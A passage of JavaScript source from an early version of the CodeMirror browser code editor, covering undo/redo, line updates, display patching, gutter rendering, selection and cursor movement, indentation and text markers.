                   ch: editEnd(replaced[replaced.length-1], change.old[change.old.length-1])};
        updateLinesNoUndo({line: change.start, ch: 0}, {line: end - 1, ch: getLine(end-1).text.length}, change.old, pos, pos);
      }
      updateInput = true;
      to.push(out);
    }
    function undo() {unredoHelper(history.done, history.undone);}
    function redo() {unredoHelper(history.undone, history.done);}

    function updateLinesNoUndo(from, to, newText, selFrom, selTo) {
      if (suppressEdits) return;
      var recomputeMaxLength = false, maxLineLength = maxLine.length;
      if (!options.lineWrapping)
        doc.iter(from.line, to.line + 1, function(line) {
          if (!line.hidden && line.text.length == maxLineLength) {recomputeMaxLength = true; return true;}
        });
      if (from.line != to.line || newText.length > 1) gutterDirty = true;

      var nlines = to.line - from.line, firstLine = getLine(from.line), lastLine = getLine(to.line);
      // First adjust the line structure, taking some care to leave highlighting intact.
      if (from.ch == 0 && to.ch == 0 && newText[newText.length - 1] == "") {
        // This is a whole-line replace. Treated specially to make
        // sure line objects move the way they are supposed to.
        var added = [], prevLine = null;
        if (from.line) {
          prevLine = getLine(from.line - 1);
          prevLine.fixMarkEnds(lastLine);
        } else lastLine.fixMarkStarts();
        for (var i = 0, e = newText.length - 1; i < e; ++i)
          added.push(Line.inheritMarks(newText[i], prevLine));
        if (nlines) doc.remove(from.line, nlines, callbacks);
        if (added.length) doc.insert(from.line, added);
      } else if (firstLine == lastLine) {
        if (newText.length == 1)
          firstLine.replace(from.ch, to.ch, newText[0]);
        else {
          lastLine = firstLine.split(to.ch, newText[newText.length-1]);
          firstLine.replace(from.ch, null, newText[0]);
          firstLine.fixMarkEnds(lastLine);
          var added = [];
          for (var i = 1, e = newText.length - 1; i < e; ++i)
            added.push(Line.inheritMarks(newText[i], firstLine));
          added.push(lastLine);
          doc.insert(from.line + 1, added);
        }
      } else if (newText.length == 1) {
        firstLine.replace(from.ch, null, newText[0]);
        lastLine.replace(null, to.ch, "");
        firstLine.append(lastLine);
        doc.remove(from.line + 1, nlines, callbacks);
      } else {
        var added = [];
        firstLine.replace(from.ch, null, newText[0]);
        lastLine.replace(null, to.ch, newText[newText.length-1]);
        firstLine.fixMarkEnds(lastLine);
        for (var i = 1, e = newText.length - 1; i < e; ++i)
          added.push(Line.inheritMarks(newText[i], firstLine));
        if (nlines > 1) doc.remove(from.line + 1, nlines - 1, callbacks);
        doc.insert(from.line + 1, added);
      }
      if (options.lineWrapping) {
        var perLine = Math.max(5, scroller.clientWidth / charWidth() - 3);
        doc.iter(from.line, from.line + newText.length, function(line) {
          if (line.hidden) return;
          var guess = Math.ceil(line.text.length / perLine) || 1;
          if (guess != line.height) updateLineHeight(line, guess);
        });
      } else {
        doc.iter(from.line, from.line + newText.length, function(line) {
          var l = line.text;
          if (!line.hidden && l.length > maxLineLength) {
            maxLine = l; maxLineLength = l.length; maxLineChanged = true;
            recomputeMaxLength = false;
          }
        });
        if (recomputeMaxLength) updateMaxLine = true;
      }

      // Add these lines to the work array, so that they will be
      // highlighted. Adjust work lines if lines were added/removed.
      var newWork = [], lendiff = newText.length - nlines - 1;
      for (var i = 0, l = work.length; i < l; ++i) {
        var task = work[i];
        if (task < from.line) newWork.push(task);
        else if (task > to.line) newWork.push(task + lendiff);
      }
      var hlEnd = from.line + Math.min(newText.length, 500);
      highlightLines(from.line, hlEnd);
      newWork.push(hlEnd);
      work = newWork;
      startWorker(100);
      // Remember that these lines changed, for updating the display
      changes.push({from: from.line, to: to.line + 1, diff: lendiff});
      var changeObj = {from: from, to: to, text: newText};
      if (textChanged) {
        for (var cur = textChanged; cur.next; cur = cur.next) {}
        cur.next = changeObj;
      } else textChanged = changeObj;

      // Update the selection
      function updateLine(n) {return n <= Math.min(to.line, to.line + lendiff) ? n : n + lendiff;}
      setSelection(clipPos(selFrom), clipPos(selTo),
                   updateLine(sel.from.line), updateLine(sel.to.line));
    }

    function updateVerticalScroll(scrollTop) {
      var th = textHeight(), virtualHeight = Math.floor(doc.height * th + 2 * paddingTop()), scrollbarHeight = scroller.clientHeight;
      scrollbar.style.height = scrollbarHeight + "px";
      if (scroller.clientHeight)
        scrollbarInner.style.height = virtualHeight + "px";
      // Position the mover div to align with the current virtual scroll position
      if (scrollTop != null) scrollbar.scrollTop = scrollTop;
      mover.style.top = (displayOffset * th - scrollbar.scrollTop) + "px";
      scrollbar.style.display = (virtualHeight > scrollbarHeight) ? "block" : "none";
    }
  
    // On Mac OS X Lion and up, detect whether the mouse is plugged in by measuring 
    // the width of a div with a scrollbar in it. If the width is <= 1, then
    // the mouse isn't plugged in and scrollbars should overlap the content.
    function overlapScrollbars() {
      var tmpSb = document.createElement('div'),
          tmpSbInner = document.createElement('div');
      tmpSb.className = "CodeMirror-scrollbar";
      tmpSb.style.cssText = "position: absolute; left: -9999px; height: 100px;";
      tmpSbInner.className = "CodeMirror-scrollbar-inner";
      tmpSbInner.style.height = "200px";
      tmpSb.appendChild(tmpSbInner);

      document.body.appendChild(tmpSb);
      var result = (tmpSb.offsetWidth <= 1);
      document.body.removeChild(tmpSb);
      return result;
    }

    function computeMaxLength() {
      var maxLineLength = 0; 
      maxLine = ""; maxLineChanged = true;
      doc.iter(0, doc.size, function(line) {
        var l = line.text;
        if (!line.hidden && l.length > maxLineLength) {
          maxLineLength = l.length; maxLine = l;
        }
      });
      updateMaxLine = false;
    }

    function replaceRange(code, from, to) {
      from = clipPos(from);
      if (!to) to = from; else to = clipPos(to);
      code = splitLines(code);
      function adjustPos(pos) {
        if (posLess(pos, from)) return pos;
        if (!posLess(to, pos)) return end;
        var line = pos.line + code.length - (to.line - from.line) - 1;
        var ch = pos.ch;
        if (pos.line == to.line)
          ch += code[code.length-1].length - (to.ch - (to.line == from.line ? from.ch : 0));
        return {line: line, ch: ch};
      }
      var end;
      replaceRange1(code, from, to, function(end1) {
        end = end1;
        return {from: adjustPos(sel.from), to: adjustPos(sel.to)};
      });
      return end;
    }
    function replaceSelection(code, collapse) {
      replaceRange1(splitLines(code), sel.from, sel.to, function(end) {
        if (collapse == "end") return {from: end, to: end};
        else if (collapse == "start") return {from: sel.from, to: sel.from};
        else return {from: sel.from, to: end};
      });
    }
    function replaceRange1(code, from, to, computeSel) {
      var endch = code.length == 1 ? code[0].length + from.ch : code[code.length-1].length;
      var newSel = computeSel({line: from.line + code.length - 1, ch: endch});
      updateLines(from, to, code, newSel.from, newSel.to);
    }

    function getRange(from, to) {
      var l1 = from.line, l2 = to.line;
      if (l1 == l2) return getLine(l1).text.slice(from.ch, to.ch);
      var code = [getLine(l1).text.slice(from.ch)];
      doc.iter(l1 + 1, l2, function(line) { code.push(line.text); });
      code.push(getLine(l2).text.slice(0, to.ch));
      return code.join("\n");
    }
    function getSelection() {
      return getRange(sel.from, sel.to);
    }

    var pollingFast = false; // Ensures slowPoll doesn't cancel fastPoll
    function slowPoll() {
      if (pollingFast) return;
      poll.set(options.pollInterval, function() {
        startOperation();
        readInput();
        if (focused) slowPoll();
        endOperation();
      });
    }
    function fastPoll() {
      var missed = false;
      pollingFast = true;
      function p() {
        startOperation();
        var changed = readInput();
        if (!changed && !missed) {missed = true; poll.set(60, p);}
        else {pollingFast = false; slowPoll();}
        endOperation();
      }
      poll.set(20, p);
    }

    // Previnput is a hack to work with IME. If we reset the textarea
    // on every change, that breaks IME. So we look for changes
    // compared to the previous content instead. (Modern browsers have
    // events that indicate IME taking place, but these are not widely
    // supported or compatible enough yet to rely on.)
    var prevInput = "";
    function readInput() {
      if (leaveInputAlone || !focused || hasSelection(input) || options.readOnly) return false;
      var text = input.value;
      if (text == prevInput) return false;
      shiftSelecting = null;
      var same = 0, l = Math.min(prevInput.length, text.length);
      while (same < l && prevInput[same] == text[same]) ++same;
      if (same < prevInput.length)
        sel.from = {line: sel.from.line, ch: sel.from.ch - (prevInput.length - same)};
      else if (overwrite && posEq(sel.from, sel.to))
        sel.to = {line: sel.to.line, ch: Math.min(getLine(sel.to.line).text.length, sel.to.ch + (text.length - same))};
      replaceSelection(text.slice(same), "end");
      if (text.length > 1000) { input.value = prevInput = ""; }
      else prevInput = text;
      return true;
    }
    function resetInput(user) {
      if (!posEq(sel.from, sel.to)) {
        prevInput = "";
        input.value = getSelection();
        selectInput(input);
      } else if (user) prevInput = input.value = "";
    }

    function focusInput() {
      if (options.readOnly != "nocursor") input.focus();
    }

    function scrollEditorIntoView() {
      if (!cursor.getBoundingClientRect) return;
      var rect = cursor.getBoundingClientRect();
      // IE returns bogus coordinates when the instance sits inside of an iframe and the cursor is hidden
      if (ie && rect.top == rect.bottom) return;
      var winH = window.innerHeight || Math.max(document.body.offsetHeight, document.documentElement.offsetHeight);
      if (rect.top < 0 || rect.bottom > winH) scrollCursorIntoView();
    }
    function scrollCursorIntoView() {
      var coords = calculateCursorCoords();
      return scrollIntoView(coords.x, coords.y, coords.x, coords.yBot);
    }
    function calculateCursorCoords() {
      var cursor = localCoords(sel.inverted ? sel.from : sel.to);
      var x = options.lineWrapping ? Math.min(cursor.x, lineSpace.offsetWidth) : cursor.x;
      return {x: x, y: cursor.y, yBot: cursor.yBot};
    }
    function scrollIntoView(x1, y1, x2, y2) {
      var scrollPos = calculateScrollPos(x1, y1, x2, y2), scrolled = false;
      if (scrollPos.scrollLeft != null) {scroller.scrollLeft = scrollPos.scrollLeft; scrolled = true;}
      if (scrollPos.scrollTop != null) {scrollbar.scrollTop = scrollPos.scrollTop; scrolled = true;}
      if (scrolled && options.onScroll) options.onScroll(instance);
    }
    function calculateScrollPos(x1, y1, x2, y2) {
      var pl = paddingLeft(), pt = paddingTop();
      y1 += pt; y2 += pt; x1 += pl; x2 += pl;
      var screen = scroller.clientHeight, screentop = scrollbar.scrollTop, result = {};
      var atTop = y1 < paddingTop() + 10;
      if (y1 < screentop) result.scrollTop = atTop ? 0 : Math.max(0, y1);
      else if (y2 > screentop + screen) result.scrollTop = y2 - screen;

      var screenw = scroller.clientWidth, screenleft = scroller.scrollLeft;
      var gutterw = options.fixedGutter ? gutter.clientWidth : 0;
      var atLeft = x1 < gutterw + pl + 10;
      if (x1 < screenleft + gutterw || atLeft) {
        if (atLeft) x1 = 0;
        result.scrollLeft = Math.max(0, x1 - 10 - gutterw);
      } else if (x2 > screenw + screenleft - 3) {
        result.scrollLeft = x2 + 10 - screenw;
      }
      return result;
    }

    function visibleLines(scrollTop) {
      var lh = textHeight(), top = (scrollTop != null ? scrollTop : scrollbar.scrollTop) - paddingTop();
      var fromHeight = Math.max(0, Math.floor(top / lh));
      var toHeight = Math.ceil((top + scroller.clientHeight) / lh);
      return {from: lineAtHeight(doc, fromHeight),
              to: lineAtHeight(doc, toHeight)};
    }
    // Uses a set of changes plus the current scroll position to
    // determine which DOM updates have to be made, and makes the
    // updates.
    function updateDisplay(changes, suppressCallback, scrollTop) {
      if (!scroller.clientWidth) {
        showingFrom = showingTo = displayOffset = 0;
        return;
      }
      // Compute the new visible window
      // If scrollTop is specified, use that to determine which lines
      // to render instead of the current scrollbar position.
      var visible = visibleLines(scrollTop);
      // Bail out if the visible area is already rendered and nothing changed.
      if (changes !== true && changes.length == 0 && visible.from > showingFrom && visible.to < showingTo) {
        updateVerticalScroll(scrollTop);
        return;
      }
      var from = Math.max(visible.from - 100, 0), to = Math.min(doc.size, visible.to + 100);
      if (showingFrom < from && from - showingFrom < 20) from = showingFrom;
      if (showingTo > to && showingTo - to < 20) to = Math.min(doc.size, showingTo);

      // Create a range of theoretically intact lines, and punch holes
      // in that using the change info.
      var intact = changes === true ? [] :
        computeIntact([{from: showingFrom, to: showingTo, domStart: 0}], changes);
      // Clip off the parts that won't be visible
      var intactLines = 0;
      for (var i = 0; i < intact.length; ++i) {
        var range = intact[i];
        if (range.from < from) {range.domStart += (from - range.from); range.from = from;}
        if (range.to > to) range.to = to;
        if (range.from >= range.to) intact.splice(i--, 1);
        else intactLines += range.to - range.from;
      }
      if (intactLines == to - from && from == showingFrom && to == showingTo) {
        updateVerticalScroll(scrollTop);
        return;
      }
      intact.sort(function(a, b) {return a.domStart - b.domStart;});

      var th = textHeight(), gutterDisplay = gutter.style.display;
      lineDiv.style.display = "none";
      patchDisplay(from, to, intact);
      lineDiv.style.display = gutter.style.display = "";

      var different = from != showingFrom || to != showingTo || lastSizeC != scroller.clientHeight + th;
      // This is just a bogus formula that detects when the editor is
      // resized or the font size changes.
      if (different) lastSizeC = scroller.clientHeight + th;
      showingFrom = from; showingTo = to;
      displayOffset = heightAtLine(doc, from);

      // Since this is all rather error prone, it is honoured with the
      // only assertion in the whole file.
      if (lineDiv.childNodes.length != showingTo - showingFrom)
        throw new Error("BAD PATCH! " + JSON.stringify(intact) + " size=" + (showingTo - showingFrom) +
                        " nodes=" + lineDiv.childNodes.length);

      function checkHeights() {
        var curNode = lineDiv.firstChild, heightChanged = false;
        doc.iter(showingFrom, showingTo, function(line) {
          if (!line.hidden) {
            var height = Math.round(curNode.offsetHeight / th) || 1;
            if (line.height != height) {
              updateLineHeight(line, height);
              gutterDirty = heightChanged = true;
            }
          }
          curNode = curNode.nextSibling;
        });
        return heightChanged;
      }

      if (options.lineWrapping) {
        // Guess whether we're going to need the scrollbar, so that we don't end up changing the linewrapping
        // after the scrollbar appears (during updateVerticalScroll()). Only do this if the scrollbar is
        // appearing (if it's disappearing, we don't have to worry about the scroll position, and there are
        // issues on IE7 if we turn it off too early).
        var virtualHeight = Math.floor(doc.height * th + 2 * paddingTop()), scrollbarHeight = scroller.clientHeight;
        if (virtualHeight > scrollbarHeight) scrollbar.style.display = "block";
        checkHeights();
      }

      gutter.style.display = gutterDisplay;
      if (different || gutterDirty) {
        // If the gutter grew in size, re-check heights. If those changed, re-draw gutter.
        updateGutter() && options.lineWrapping && checkHeights() && updateGutter();
      }
      updateSelection();
      updateVerticalScroll(scrollTop);
      if (!suppressCallback && options.onUpdate) options.onUpdate(instance);
      return true;
    }

    function computeIntact(intact, changes) {
      for (var i = 0, l = changes.length || 0; i < l; ++i) {
        var change = changes[i], intact2 = [], diff = change.diff || 0;
        for (var j = 0, l2 = intact.length; j < l2; ++j) {
          var range = intact[j];
          if (change.to <= range.from && change.diff)
            intact2.push({from: range.from + diff, to: range.to + diff,
                          domStart: range.domStart});
          else if (change.to <= range.from || change.from >= range.to)
            intact2.push(range);
          else {
            if (change.from > range.from)
              intact2.push({from: range.from, to: change.from, domStart: range.domStart});
            if (change.to < range.to)
              intact2.push({from: change.to + diff, to: range.to + diff,
                            domStart: range.domStart + (change.to - range.from)});
          }
        }
        intact = intact2;
      }
      return intact;
    }

    function patchDisplay(from, to, intact) {
      // The first pass removes the DOM nodes that aren't intact.
      if (!intact.length) lineDiv.innerHTML = "";
      else {
        function killNode(node) {
          var tmp = node.nextSibling;
          node.parentNode.removeChild(node);
          return tmp;
        }
        var domPos = 0, curNode = lineDiv.firstChild, n;
        for (var i = 0; i < intact.length; ++i) {
          var cur = intact[i];
          while (cur.domStart > domPos) {curNode = killNode(curNode); domPos++;}
          for (var j = 0, e = cur.to - cur.from; j < e; ++j) {curNode = curNode.nextSibling; domPos++;}
        }
        while (curNode) curNode = killNode(curNode);
      }
      // This pass fills in the lines that actually changed.
      var nextIntact = intact.shift(), curNode = lineDiv.firstChild, j = from;
      var scratch = document.createElement("div");
      doc.iter(from, to, function(line) {
        if (nextIntact && nextIntact.to == j) nextIntact = intact.shift();
        if (!nextIntact || nextIntact.from > j) {
          if (line.hidden) var html = scratch.innerHTML = "<pre></pre>";
          else {
            var html = '<pre' + (line.className ? ' class="' + line.className + '"' : '') + '>'
              + line.getHTML(makeTab) + '</pre>';
            // Kludge to make sure the styled element lies behind the selection (by z-index)
            if (line.bgClassName)
              html = '<div style="position: relative"><pre class="' + line.bgClassName +
              '" style="position: absolute; left: 0; right: 0; top: 0; bottom: 0; z-index: -2">&#160;</pre>' + html + "</div>";
          }
          scratch.innerHTML = html;
          lineDiv.insertBefore(scratch.firstChild, curNode);
        } else {
          curNode = curNode.nextSibling;
        }
        ++j;
      });
    }

    function updateGutter() {
      if (!options.gutter && !options.lineNumbers) return;
      var hText = mover.offsetHeight, hEditor = scroller.clientHeight;
      gutter.style.height = (hText - hEditor < 2 ? hEditor : hText) + "px";
      var html = [], i = showingFrom, normalNode;
      doc.iter(showingFrom, Math.max(showingTo, showingFrom + 1), function(line) {
        if (line.hidden) {
          html.push("<pre></pre>");
        } else {
          var marker = line.gutterMarker;
          var text = options.lineNumbers ? i + options.firstLineNumber : null;
          if (marker && marker.text)
            text = marker.text.replace("%N%", text != null ? text : "");
          else if (text == null)
            text = "\u00a0";
          html.push((marker && marker.style ? '<pre class="' + marker.style + '">' : "<pre>"), text);
          for (var j = 1; j < line.height; ++j) html.push("<br/>&#160;");
          html.push("</pre>");
          if (!marker) normalNode = i;
        }
        ++i;
      });
      gutter.style.display = "none";
      gutterText.innerHTML = html.join("");
      // Make sure scrolling doesn't cause number gutter size to pop
      if (normalNode != null && options.lineNumbers) {
        var node = gutterText.childNodes[normalNode - showingFrom];
        var minwidth = String(doc.size).length, val = eltText(node.firstChild), pad = "";
        while (val.length + pad.length < minwidth) pad += "\u00a0";
        if (pad) node.insertBefore(document.createTextNode(pad), node.firstChild);
      }
      gutter.style.display = "";
      var resized = Math.abs((parseInt(lineSpace.style.marginLeft) || 0) - gutter.offsetWidth) > 2;
      lineSpace.style.marginLeft = gutter.offsetWidth + "px";
      gutterDirty = false;
      return resized;
    }
    function updateSelection() {
      var collapsed = posEq(sel.from, sel.to);
      var fromPos = localCoords(sel.from, true);
      var toPos = collapsed ? fromPos : localCoords(sel.to, true);
      var headPos = sel.inverted ? fromPos : toPos, th = textHeight();
      var wrapOff = eltOffset(wrapper), lineOff = eltOffset(lineDiv);
      inputDiv.style.top = Math.max(0, Math.min(scroller.offsetHeight, headPos.y + lineOff.top - wrapOff.top)) + "px";
      inputDiv.style.left = Math.max(0, Math.min(scroller.offsetWidth, headPos.x + lineOff.left - wrapOff.left)) + "px";
      if (collapsed) {
        cursor.style.top = headPos.y + "px";
        cursor.style.left = (options.lineWrapping ? Math.min(headPos.x, lineSpace.offsetWidth) : headPos.x) + "px";
        cursor.style.display = "";
        selectionDiv.style.display = "none";
      } else {
        var sameLine = fromPos.y == toPos.y, html = "";
        var clientWidth = lineSpace.clientWidth || lineSpace.offsetWidth;
        var clientHeight = lineSpace.clientHeight || lineSpace.offsetHeight;
        function add(left, top, right, height) {
          var rstyle = quirksMode ? "width: " + (!right ? clientWidth : clientWidth - right - left) + "px"
                                  : "right: " + right + "px";
          html += '<div class="CodeMirror-selected" style="position: absolute; left: ' + left +
            'px; top: ' + top + 'px; ' + rstyle + '; height: ' + height + 'px"></div>';
        }
        if (sel.from.ch && fromPos.y >= 0) {
          var right = sameLine ? clientWidth - toPos.x : 0;
          add(fromPos.x, fromPos.y, right, th);
        }
        var middleStart = Math.max(0, fromPos.y + (sel.from.ch ? th : 0));
        var middleHeight = Math.min(toPos.y, clientHeight) - middleStart;
        if (middleHeight > 0.2 * th)
          add(0, middleStart, 0, middleHeight);
        if ((!sameLine || !sel.from.ch) && toPos.y < clientHeight - .5 * th)
          add(0, toPos.y, clientWidth - toPos.x, th);
        selectionDiv.innerHTML = html;
        cursor.style.display = "none";
        selectionDiv.style.display = "";
      }
    }

    function setShift(val) {
      if (val) shiftSelecting = shiftSelecting || (sel.inverted ? sel.to : sel.from);
      else shiftSelecting = null;
    }
    function setSelectionUser(from, to) {
      var sh = shiftSelecting && clipPos(shiftSelecting);
      if (sh) {
        if (posLess(sh, from)) from = sh;
        else if (posLess(to, sh)) to = sh;
      }
      setSelection(from, to);
      userSelChange = true;
    }
    // Update the selection. Last two args are only used by
    // updateLines, since they have to be expressed in the line
    // numbers before the update.
    function setSelection(from, to, oldFrom, oldTo) {
      goalColumn = null;
      if (oldFrom == null) {oldFrom = sel.from.line; oldTo = sel.to.line;}
      if (posEq(sel.from, from) && posEq(sel.to, to)) return;
      if (posLess(to, from)) {var tmp = to; to = from; from = tmp;}

      // Skip over hidden lines.
      if (from.line != oldFrom) {
        var from1 = skipHidden(from, oldFrom, sel.from.ch);
        // If there is no non-hidden line left, force visibility on current line
        if (!from1) setLineHidden(from.line, false);
        else from = from1;
      }
      if (to.line != oldTo) to = skipHidden(to, oldTo, sel.to.ch);

      if (posEq(from, to)) sel.inverted = false;
      else if (posEq(from, sel.to)) sel.inverted = false;
      else if (posEq(to, sel.from)) sel.inverted = true;

      if (options.autoClearEmptyLines && posEq(sel.from, sel.to)) {
        var head = sel.inverted ? from : to;
        if (head.line != sel.from.line && sel.from.line < doc.size) {
          var oldLine = getLine(sel.from.line);
          if (/^\s+$/.test(oldLine.text))
            setTimeout(operation(function() {
              if (oldLine.parent && /^\s+$/.test(oldLine.text)) {
                var no = lineNo(oldLine);
                replaceRange("", {line: no, ch: 0}, {line: no, ch: oldLine.text.length});
              }
            }, 10));
        }
      }

      sel.from = from; sel.to = to;
      selectionChanged = true;
    }
    function skipHidden(pos, oldLine, oldCh) {
      function getNonHidden(dir) {
        var lNo = pos.line + dir, end = dir == 1 ? doc.size : -1;
        while (lNo != end) {
          var line = getLine(lNo);
          if (!line.hidden) {
            var ch = pos.ch;
            if (toEnd || ch > oldCh || ch > line.text.length) ch = line.text.length;
            return {line: lNo, ch: ch};
          }
          lNo += dir;
        }
      }
      var line = getLine(pos.line);
      var toEnd = pos.ch == line.text.length && pos.ch != oldCh;
      if (!line.hidden) return pos;
      if (pos.line >= oldLine) return getNonHidden(1) || getNonHidden(-1);
      else return getNonHidden(-1) || getNonHidden(1);
    }
    function setCursor(line, ch, user) {
      var pos = clipPos({line: line, ch: ch || 0});
      (user ? setSelectionUser : setSelection)(pos, pos);
    }

    function clipLine(n) {return Math.max(0, Math.min(n, doc.size-1));}
    function clipPos(pos) {
      if (pos.line < 0) return {line: 0, ch: 0};
      if (pos.line >= doc.size) return {line: doc.size-1, ch: getLine(doc.size-1).text.length};
      var ch = pos.ch, linelen = getLine(pos.line).text.length;
      if (ch == null || ch > linelen) return {line: pos.line, ch: linelen};
      else if (ch < 0) return {line: pos.line, ch: 0};
      else return pos;
    }

    function findPosH(dir, unit) {
      var end = sel.inverted ? sel.from : sel.to, line = end.line, ch = end.ch;
      var lineObj = getLine(line);
      function findNextLine() {
        for (var l = line + dir, e = dir < 0 ? -1 : doc.size; l != e; l += dir) {
          var lo = getLine(l);
          if (!lo.hidden) { line = l; lineObj = lo; return true; }
        }
      }
      function moveOnce(boundToLine) {
        if (ch == (dir < 0 ? 0 : lineObj.text.length)) {
          if (!boundToLine && findNextLine()) ch = dir < 0 ? lineObj.text.length : 0;
          else return false;
        } else ch += dir;
        return true;
      }
      if (unit == "char") moveOnce();
      else if (unit == "column") moveOnce(true);
      else if (unit == "word") {
        var sawWord = false;
        for (;;) {
          if (dir < 0) if (!moveOnce()) break;
          if (isWordChar(lineObj.text.charAt(ch))) sawWord = true;
          else if (sawWord) {if (dir < 0) {dir = 1; moveOnce();} break;}
          if (dir > 0) if (!moveOnce()) break;
        }
      }
      return {line: line, ch: ch};
    }
    function moveH(dir, unit) {
      var pos = dir < 0 ? sel.from : sel.to;
      if (shiftSelecting || posEq(sel.from, sel.to)) pos = findPosH(dir, unit);
      setCursor(pos.line, pos.ch, true);
    }
    function deleteH(dir, unit) {
      if (!posEq(sel.from, sel.to)) replaceRange("", sel.from, sel.to);
      else if (dir < 0) replaceRange("", findPosH(dir, unit), sel.to);
      else replaceRange("", sel.from, findPosH(dir, unit));
      userSelChange = true;
    }
    var goalColumn = null;
    function moveV(dir, unit) {
      var dist = 0, pos = localCoords(sel.inverted ? sel.from : sel.to, true);
      if (goalColumn != null) pos.x = goalColumn;
      if (unit == "page") dist = Math.min(scroller.clientHeight, window.innerHeight || document.documentElement.clientHeight);
      else if (unit == "line") dist = textHeight();
      var target = coordsChar(pos.x, pos.y + dist * dir + 2);
      if (unit == "page") scrollbar.scrollTop += localCoords(target, true).y - pos.y;
      setCursor(target.line, target.ch, true);
      goalColumn = pos.x;
    }

    function selectWordAt(pos) {
      var line = getLine(pos.line).text;
      var start = pos.ch, end = pos.ch;
      while (start > 0 && isWordChar(line.charAt(start - 1))) --start;
      while (end < line.length && isWordChar(line.charAt(end))) ++end;
      setSelectionUser({line: pos.line, ch: start}, {line: pos.line, ch: end});
    }
    function selectLine(line) {
      setSelectionUser({line: line, ch: 0}, clipPos({line: line + 1, ch: 0}));
    }
    function indentSelected(mode) {
      if (posEq(sel.from, sel.to)) return indentLine(sel.from.line, mode);
      var e = sel.to.line - (sel.to.ch ? 0 : 1);
      for (var i = sel.from.line; i <= e; ++i) indentLine(i, mode);
    }

    function indentLine(n, how) {
      if (!how) how = "add";
      if (how == "smart") {
        if (!mode.indent) how = "prev";
        else var state = getStateBefore(n);
      }

      var line = getLine(n), curSpace = line.indentation(options.tabSize),
          curSpaceString = line.text.match(/^\s*/)[0], indentation;
      if (how == "smart") {
        indentation = mode.indent(state, line.text.slice(curSpaceString.length), line.text);
        if (indentation == Pass) how = "prev";
      }
      if (how == "prev") {
        if (n) indentation = getLine(n-1).indentation(options.tabSize);
        else indentation = 0;
      }
      else if (how == "add") indentation = curSpace + options.indentUnit;
      else if (how == "subtract") indentation = curSpace - options.indentUnit;
      indentation = Math.max(0, indentation);
      var diff = indentation - curSpace;

      if (!diff) {
        if (sel.from.line != n && sel.to.line != n) return;
        var indentString = curSpaceString;
      } else {
        var indentString = "", pos = 0;
        if (options.indentWithTabs)
          for (var i = Math.floor(indentation / options.tabSize); i; --i) {pos += options.tabSize; indentString += "\t";}
        while (pos < indentation) {++pos; indentString += " ";}
      }

      replaceRange(indentString, {line: n, ch: 0}, {line: n, ch: curSpaceString.length});
    }

    function loadMode() {
      mode = CodeMirror.getMode(options, options.mode);
      doc.iter(0, doc.size, function(line) { line.stateAfter = null; });
      work = [0];
      startWorker();
    }
    function gutterChanged() {
      var visible = options.gutter || options.lineNumbers;
      gutter.style.display = visible ? "" : "none";
      if (visible) gutterDirty = true;
      else lineDiv.parentNode.style.marginLeft = 0;
    }
    function wrappingChanged(from, to) {
      if (options.lineWrapping) {
        wrapper.className += " CodeMirror-wrap";
        var perLine = scroller.clientWidth / charWidth() - 3;
        doc.iter(0, doc.size, function(line) {
          if (line.hidden) return;
          var guess = Math.ceil(line.text.length / perLine) || 1;
          if (guess != 1) updateLineHeight(line, guess);
        });
        lineSpace.style.width = code.style.width = "";
        widthForcer.style.left = "";
      } else {
        wrapper.className = wrapper.className.replace(" CodeMirror-wrap", "");
        maxLine = ""; maxLineChanged = true;
        doc.iter(0, doc.size, function(line) {
          if (line.height != 1 && !line.hidden) updateLineHeight(line, 1);
          if (line.text.length > maxLine.length) maxLine = line.text;
        });
      }
      changes.push({from: 0, to: doc.size});
    }
    function makeTab(col) {
      var w = options.tabSize - col % options.tabSize, cached = tabCache[w];
      if (cached) return cached;
      for (var str = '<span class="cm-tab">', i = 0; i < w; ++i) str += " ";
      return (tabCache[w] = {html: str + "</span>", width: w});
    }
    function themeChanged() {
      scroller.className = scroller.className.replace(/\s*cm-s-\S+/g, "") +
        options.theme.replace(/(^|\s)\s*/g, " cm-s-");
    }
    function keyMapChanged() {
      var style = keyMap[options.keyMap].style;
      wrapper.className = wrapper.className.replace(/\s*cm-keymap-\S+/g, "") +
        (style ? " cm-keymap-" + style : "");
    }

    function TextMarker() { this.set = []; }
    TextMarker.prototype.clear = operation(function() {
      var min = Infinity, max = -Infinity;
      for (var i = 0, e = this.set.length; i < e; ++i) {
        var line = this.set[i], mk = line.marked;
        if (!mk || !line.parent) continue;
        var lineN = lineNo(line);
        min = Math.min(min, lineN); max = Math.max(max, lineN);
        for (var j = 0; j < mk.length; ++j)
          if (mk[j].marker == this) mk.splice(j--, 1);
      }
      if (min != Infinity)
        changes.push({from: min, to: max + 1});
    });
    TextMarker.prototype.find = function() {
      var from, to;
      for (var i = 0, e = this.set.length; i < e; ++i) {
        var line = this.set[i], mk = line.marked;
        for (var j = 0; j < mk.length; ++j) {
          var mark = mk[j];
          if (mark.marker == this) {
            if (mark.from != null || mark.to != null) {
              var found = lineNo(line);
              if (found != null) {
                if (mark.from != null) from = {line: found, ch: mark.from};
                if (mark.to != null) to = {line: found, ch: mark.to};
              }
            }
          }
        }
      }
      return {from: from, to: to};
    };

    function markText(from, to, className) {
      from = clipPos(from); to = clipPos(to);
      var tm = new TextMarker();
      if (!posLess(from, to)) return tm;
      function add(line, from, to, className) {
        getLine(line).addMark(new MarkedText(from, to, className, tm));
      }
      if (from.line == to.line) add(from.line, from.ch, to.ch, className);
      else {
        add(from.line, from.ch, null, className);
        for (var i = from.line + 1, e = to.line; i < e; ++i)
          add(i, null, null, className);
        add(to.line, null, to.ch, className);
      }
      changes.push({from: from.line, to: to.line + 1});
      return tm;
    }

    function setBookmark(pos) {
      pos = clipPos(pos);
      var bm = new Bookmark(pos.ch);
      getLine(pos.line).addMark(bm);
      return bm;
    }

    function findMarksAt(pos) {
      pos = clipPos(pos);
      var markers = [], marked = getLine(pos.line).marked;
      if (!marked) return markers;
      for (var i = 0, e = marked.length; i < e; ++i) {
        var m = marked[i];
        if ((m.from == null || m.from <= pos.ch) &&
            (m.to == null || m.to >= pos.ch))
          markers.push(m.marker || m);
      }
      return markers;
    }

    function addGutterMarker(line, text, className) {
      if (typeof line == "number") line = getLine(clipLine(line));
      line.gutterMarker = {text: text, style: className};
      gutterDirty = true;
      return line;
    }
    function removeGutterMarker(line) {
      if (typeof line == "number") line = getLine(clipLine(line));
      line.gutterMarker = null;
      gutterDirty = true;
    }

    function changeLine(handle, op) {
      var no = handle, line = handle;
      if (typeof handle == "number") line = getLine(clipLine(handle));
      else no = lineNo(handle);
      if (no == null) return null;
      if (op(line, no)) changes.push({from: no, to: no + 1});
      else return null;
      return line;
    }
